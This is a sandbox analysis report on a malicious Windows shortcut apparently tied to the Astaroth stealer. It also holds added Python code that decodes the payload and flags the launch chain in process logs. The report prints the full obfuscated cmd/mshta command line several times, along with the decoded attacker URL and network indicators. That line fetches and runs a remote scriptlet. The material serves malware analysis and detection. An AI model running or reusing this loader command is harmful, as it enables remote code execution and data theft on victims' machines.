
Windows Analysis Report
Intimacao758073849.lNK.lnk

Overview

General Information

Sample name: Intimacao758073849.lNK.lnk
Analysis ID: 1615368
MD5: bbf3972f4aaedf65174fd0cd7cf6d757
SHA1: be4570f581198b959cc3c882c2490189f435c12d
SHA256: 031f5daf0774b13b3a63aa8640620c391f986ddfd29dede692480e6335383666
Tags: lnk, user-abuse_ch

Detection

Score: 68 (range 0 - 100)
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Joe Sandbox ML detected suspicious sample
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1172 cmdline: "C:\Windows\System32\cmd.exe" /v:on /v:off /D/c MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 4852 cmdline: MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
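The mshta argument in the process tree builds its two string literals out of hex (\xHH) and legacy octal (\ooo) JScript escapes, so neither the method name nor the scriptlet URL appears in clear text on the command line. The Python below is an added example and not part of the Joe Sandbox report: it decodes the literals from a copy of that argument and returns the indicators an analyst needs (the protocol handler mshta is asked to run, the GetObject moniker scheme, the URL and host, and the method invoked). The regular expressions, function names and result keys are my own.

```python
import re
from urllib.parse import urlsplit

# Constructed copy of the mshta argument shown in the process tree above, kept as
# a raw string so that Python does not resolve the JavaScript escapes itself.
MSHTA_ARG = (
    r'javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51",'
    r'"\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69'
    r'\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163'
    r'\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}'
    r'catch(e){}}catch(e){}}catch(e){}close()'
)

# JScript string escapes used by the sample: \xHH (hex) and the legacy \ooo octal form.
JS_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})')
# A double-quoted JS literal with its escapes still intact.
JS_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')


def decode_js_escapes(literal: str) -> str:
    """Resolve \\xHH and \\ooo escapes to the characters they encode."""
    def one(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return JS_ESCAPE.sub(one, literal)


def analyse_mshta_payload(arg: str) -> dict:
    """Decode the string table and report the indicators the payload depends on."""
    literals = [decode_js_escapes(s) for s in JS_STRING.findall(arg)]
    # The code is GetObject(tbl[1])[tbl[0]](): tbl[1] is a moniker (scheme:...),
    # tbl[0] is the name of the method invoked on the object it returns.
    moniker = next(s for s in literals if ':' in s)
    method = next(s for s in literals if ':' not in s)
    scheme, _, url = moniker.partition(':')
    parts = urlsplit(url)                      # scheme and hostname come back lower-cased
    return {
        'protocol_handler': arg.split(':', 1)[0].lower(),   # what mshta is asked to run
        'moniker_scheme': scheme.lower(),                    # 'script' = remote scriptlet
        'remote_url': url,                                   # verbatim, mixed case included
        'host': parts.hostname,
        'method_called': method,
    }


if __name__ == '__main__':
    for key, value in analyse_mshta_payload(MSHTA_ARG).items():
        print(f'{key:18} {value}')
```

Decoded, the table is ["WDUBWCQ", "script:HttPs://tritum.vizpaz.express/?1/"], which matches the HttPs://tritum.vizpaz.express/?1/ string the report later finds in mshta.exe memory. GetObject on a script: moniker fetches a Windows Script Component from that URL and instantiates it (the moniker handler lives in scrobj.dll, which the report lists among the modules mshta.exe loads), and the decoded method name is then invoked on the returned object. The three nested try/catch blocks swallow any failure so the process exits quietly, and the mixed case in javAscRipT, MShTa and HttPs changes nothing at execution time because the protocol handler, the binary name and the URL scheme are all case-insensitive; it only defeats case-sensitive string matching.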
No configs have been found
No yara matches
No Sigma rule has matched

Suricata IDS alerts

Timestamp                       | SID     | Severity | Classtype                     | Source IP   | Source Port | Destination IP | Destination Port | Protocol
2025-02-14T20:11:02.680532+0100 | 2851288 | 1        | A Network Trojan was detected | 192.168.2.6 | 49709       | 188.114.96.3   | 443              | TCP


AV Detection

Source: Intimacao758073849.lNK.lnk | Virustotal: Detection: 29%
Source: Intimacao758073849.lNK.lnk | ReversingLabs: Detection: 27%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.4% probability

Networking

Source: Network traffic | Suricata IDS: 2851288 - Severity 1 - ETPRO MALWARE Astaroth Stealer Activity (GET) : 192.168.2.6:49709 -> 188.114.96.3:443
Source: global traffic | TCP traffic: 192.168.2.6:55165 -> 1.1.1.1:53
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 185.15.59.224
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /?1/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: tritum.vizpaz.express
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: www.wikipedia.org
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 connections)
Source: global traffic | DNS traffic detected: DNS query: tritum.vizpaz.express
Source: global traffic | DNS traffic detected: DNS query: www.wikipedia.org
Source: mshta.exe, 00000002.00000003.2161051958.000002AA1356D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164126544.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153676662.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164908121.000002A210B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    HttPs://tritum.vizpaz.express/?1/
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165544408.000002AA136C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA13663000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153759719.000002AA136C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | Strings found in binary or memory:
    https://creativecommons.org/licenses/by-sa/4.0/
    https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy
    https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use
Source: mshta.exe, 00000002.00000003.2150557370.000002AA13425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2157208483.000002AA1343A000.00000004.00000020.00020000.00000000.sdmp, 4NWM0C2K.htm.2.dr | Strings found in binary or memory:
    https://donate.wikimedia.org/?wmf_medium=portal&wmf_campaign=portalFooter&wmf_source=portalFooter
    https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8
    https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias
    https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu
    https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2.
    https://wikis.world/
Source: mshta.exe, 00000002.00000003.2164201881.000002A210B49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164815019.000002A210B25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164299160.000002A210B25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153593726.000002A210BD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164846336.000002A210B4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153795741.000002A210B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c
Source: mshta.exe, 00000002.00000003.2139843570.000002AA1366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2164126544.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153676662.000002A210B75000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2164908121.000002A210B75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    https://tritum.vizpaz.express/?1/
Source: mshta.exe, 00000002.00000003.2164280112.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153779908.000002AA136BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    https://tritum.vizpaz.express/?1/(
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory:
    https://tritum.vizpaz.express/?1/C
    https://tritum.vizpaz.express/?1/F
    https://tritum.vizpaz.express/?1/k
    https://tritum.vizpaz.express/W
    https://tritum.vizpaz.express/Y
Source: mshta.exe, 00000002.00000003.2164280112.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165519421.000002AA136BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153779908.000002AA136BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153327660.000002AA136A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    https://tritum.vizpaz.express/?1/I
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.15.59.224:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal68.winLNK@4/1@2/2
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\4NWM0C2K.htm
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v:on /v:off /D/c MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe MShTa "javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51","\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}catch(e){}}catch(e){}}catch(e){}close()"
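The process creations above (LNK -> cmd.exe -> mshta.exe with an inline javascript: URI) are what the "Windows shortcut file (LNK) starts blacklisted processes" and "Very long cmdline option found" signatures key on. The Python below is an added example, not the sandbox's own signature logic: it scores constructed records shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) with a handful of heuristics that together separate this chain from a legitimate mshta launch of a local .hta file. The records are made up; the first two reuse this report's command lines, the other two are benign controls. The thresholds and heuristic names are my own.

```python
import re

# Constructed copy of the mshta argument from this report (raw string so that
# Python does not resolve the JavaScript escapes itself).
MSHTA_ARG = (
    r'javAscRipT:try{try{try{var _33lI1XURA=["\x57\x44\x55\102\x57\x43\x51",'
    r'"\163\143\x72\x69\160\164\x3a\x48\164\x74\x50\x73\x3a\57\x2f\x74\x72\x69'
    r'\x74\x75\x6d\56\x76\x69\x7a\160\x61\x7a\56\x65\170\x70\x72\145\x73\163'
    r'\x2f\x3f\x31\x2f"];GetObject(_33lI1XURA[1])[_33lI1XURA[0]]();}'
    r'catch(e){}}catch(e){}}catch(e){}close()'
)

# Constructed process-creation records (Sysmon Event ID 1 field names).
# Records 0 and 1 reproduce the chain in this report; 2 and 3 are benign controls.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /v:on /v:off /D/c MShTa "' + MSHTA_ARG + '"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'MShTa "' + MSHTA_ARG + '"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},   # local HTA, no inline script
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c dir'},
]

MSHTA_NAME = re.compile(r'\bmshta(?:\.exe)?\b', re.I)
INLINE_SCRIPT = re.compile(r'\b(?:javascript|vbscript|about):', re.I)   # script URI instead of a file
REMOTE_OBJECT = re.compile(r'GetObject\s*\(|\bscript:|https?:', re.I)   # remote moniker / URL
ESCAPED_CHAR = re.compile(r'\\x[0-9a-f]{2}|\\[0-7]{1,3}', re.I)        # \xHH or \ooo escape
ESCAPE_THRESHOLD = 8   # assumption: legitimate HTA launches do not carry escaped literals


def score_event(ev: dict) -> list:
    """Return the heuristics an event trips; an empty list means no concern."""
    reasons = []
    cmd = ev["CommandLine"]
    name = MSHTA_NAME.search(cmd)
    if not (ev["Image"].lower().endswith(r"\mshta.exe") or name):
        return reasons                     # only mshta launches are in scope here
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline script: URI instead of an .hta file")
    if REMOTE_OBJECT.search(cmd):
        reasons.append("payload resolves a remote object (GetObject / script: moniker)")
    if len(ESCAPED_CHAR.findall(cmd)) >= ESCAPE_THRESHOLD:
        reasons.append("string literals assembled from hex/octal escapes")
    if name and name.group(0) not in (name.group(0).lower(), name.group(0).upper()):
        reasons.append("mixed-case binary name (defeats case-sensitive matching)")
    if ev["ParentImage"].lower().endswith(r"\cmd.exe"):
        reasons.append("spawned by cmd.exe (LNK -> cmd -> mshta chain)")
    return reasons


def triage(events: list) -> list:
    """(index, reasons) for every event that trips at least two heuristics."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= 2:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in triage(EVENTS):
        print(f"event {i}: {EVENTS[i]['Image']}")
        for r in reasons:
            print(f"    - {r}")
```

The cmd.exe record trips the script-URI, remote-object, escape and mixed-case checks even though its Image is not mshta.exe, because the whole mshta invocation sits in its command line; the mshta.exe record adds the cmd.exe parent. The local-HTA control and the plain cmd.exe record trip nothing. Requiring two heuristics rather than one keeps a single mshta.exe that opens a vendor .hta out of the alert queue while still catching this chain if one of the checks is evaded.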
Source: C:\Windows\System32\mshta.exe | Sections loaded (in load order, repeated loads collapsed): wldp.dll, mshtml.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, urlmon.dll, srvcli.dll, kernel.appcore.dll, msiso.dll, uxtheme.dll, srpapi.dll, msimtf.dll, dxgi.dll, resourcepolicyclient.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, dataexchange.dll, d3d11.dll, dcomp.dll, twinapi.appcore.dll, jscript9.dll, scrobj.dll, wininet.dll, windows.storage.dll, profapi.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, msls31.dll, d2d1.dll, dwrite.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\cmd.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: mshta.exe, 00000002.00000002.2164961990.000002A210BA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2165374329.000002AA13654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2153464520.000002A210BA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
MITRE ATT&CK Matrix

Techniques matched by this analysis, grouped by tactic (the number in parentheses is the count shown in the report's matrix cell):

  • Execution: Command and Scripting Interpreter (1)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: DLL Side-Loading (1), Process Injection (11)
  • Defense Evasion: DLL Side-Loading (1), Process Injection (11), Masquerading (1)
  • Discovery: Security Software Discovery (1), Process Discovery (1), File and Directory Discovery (1), System Information Discovery (2)
  • Collection: Email Collection (1)
  • Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Ingress Tool Transfer (1)

No techniques matched under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.